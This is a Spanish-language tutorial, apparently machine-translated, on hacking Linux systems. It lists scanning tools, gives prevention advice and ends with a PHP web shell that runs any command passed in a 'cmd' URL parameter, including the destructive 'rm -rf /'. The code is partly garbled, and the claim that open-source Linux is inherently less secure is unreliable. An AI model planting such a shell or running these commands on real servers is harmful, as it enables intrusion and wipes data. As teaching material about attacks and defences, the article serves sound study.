Hackear sistemas Linux
Linux es el sistema operativo de servidor más utilizado especialmente para servidores web. Es de código abierto; Esto significa que cualquiera puede tener acceso al código fuente. Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades . Linux Hacking se trata de explotar estas vulnerabilidades para obtener acceso no autorizado a un sistema.
En este artículo, le presentaremos qué es Linux, sus vulnerabilidades de seguridad y las medidas de contador que puede implementar.
Nota rápida sobre Linux
Linux es un sistema operativo de código abierto . Hay muchas distribuciones de sistemas operativos basados en Linux, como Redhat, Fedora y Ubuntu, etc. A diferencia de otros sistemas operativos, Linux es menos seguro cuando se trata de seguridad. Esto se debe a que el código fuente está disponible libremente, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlo en comparación con otros sistemas operativos que no son de código abierto. Linux puede usarse como servidor, computadora de escritorio, tableta o sistema operativo de dispositivo móvil.
Los programas de Linux se pueden operar utilizando GUI o comandos. Los comandos son más efectivos y eficientes en comparación con el uso de la GUI. Por esta razón, ayuda conocer los comandos básicos de Linux.
Herramientas de pirateo de Linux
- Nessus : esta herramienta se puede usar para escanear ajustes de configuración, parches, redes, etc., se puede encontrar en https://www.tenable.com/products/…
- NMap. Esta herramienta se puede usar para monitorear hosts que se ejecutan en el servidor y los servicios que están utilizando. También se puede usar para buscar puertos. Se puede encontrar en http://nmap.org/
- SARA – SARA es el acrónimo de Asistente de Investigación del Auditor de Seguridad. Como su nombre lo indica, esta herramienta se puede usar para auditar redes contra amenazas como sql Injection, XSS, etc. Se puede encontrar en http://www-arc.com/sara/sara.html
La lista de arriba no es exhaustiva; te da una idea de las herramientas disponibles para hackear sistemas Linux.
Cómo prevenir hacks de Linux
La piratería de Linux aprovecha las vulnerabilidades en el sistema operativo. Una organización puede adoptar la siguiente política para protegerse contra tales ataques.
- Administración de parches: los parches corrigen errores que los atacantes explotan para comprometer un sistema. Una buena política de administración de parches garantizará que aplique constantemente parches relevantes a su sistema.
- Configuración adecuada del sistema operativo : otras vulnerabilidades aprovechan las debilidades en la configuración del servidor. Los nombres de usuario inactivos y los demonios deben estar deshabilitados. Se deben cambiar las configuraciones predeterminadas, como las contraseñas comunes de la aplicación, los nombres de usuario predeterminados y algunos números de puerto.
- Sistema de detección de intrusiones : estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir tales ataques.
Actividad de piratería: piratee un sistema Linux usando PHP
En este escenario práctico, le proporcionaremos información básica sobre cómo puede usar PHP para comprometer un Linux. No vamos a apuntar a ninguna víctima. Si desea probarlo, puede instalar LAMPP en su máquina local.
PHP viene con dos funciones que se pueden usar para ejecutar comandos de Linux. Tiene funciones exec () y shell_exec (). La función exec () devuelve la última línea de la salida del comando mientras que shell_exec () devuelve el resultado completo del comando como una cadena.
Para fines de demostración, supongamos que los administradores del atacante cargan el siguiente archivo en un servidor web.
?
1
2
3
4 4
5 5
6 6
7 7
8
9 9
10
11
$cmd
= isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
= isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo
"executing shell command:-> $cmd";
$output
= shell_exec($cmd);
echo
"
$output
";
?>
AQUÍ,
El script anterior obtiene el comando de la variable GET llamada cmd. El comando se ejecuta utilizando shell_exec () y los resultados se devuelven en el navegador.
El código anterior se puede explotar usando la siguiente URL
http: //localhost/cp/konsole.php ? ...
AQUÍ,
- "... konsole.php? Cmd = ls% 20-l" asigna el valor ls –l a la variable cmd .
El comando ejecutado contra el servidor será
shell_exec ('ls -l');
La ejecución del código anterior en un servidor web proporciona resultados similares a los siguientes.
El comando anterior simplemente muestra los archivos en el directorio actual y los permisos
Supongamos que el atacante pasa el siguiente comando
rm -rf /
AQUÍ,
- "Rm" elimina los archivos
- "Rf" hace que el comando rm se ejecute en modo recursivo. Eliminar todas las carpetas y archivos
- "/" Indica al comando que comience a eliminar archivos del directorio raíz
La URL de ataque se vería así
http: //localhost/cp/konsole.php ? ...
Resumen
- Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos móviles.
- Linux es de código abierto y cualquiera puede obtener el código fuente. Esto facilita detectar las vulnerabilidades.
- Los comandos básicos y de red son valiosos para los hackers de Linux.
- Las vulnerabilidades son debilidades que pueden explotarse para comprometer un sistema.
- Una buena seguridad puede ayudar a proteger un sistema de ser atacado por un atacante.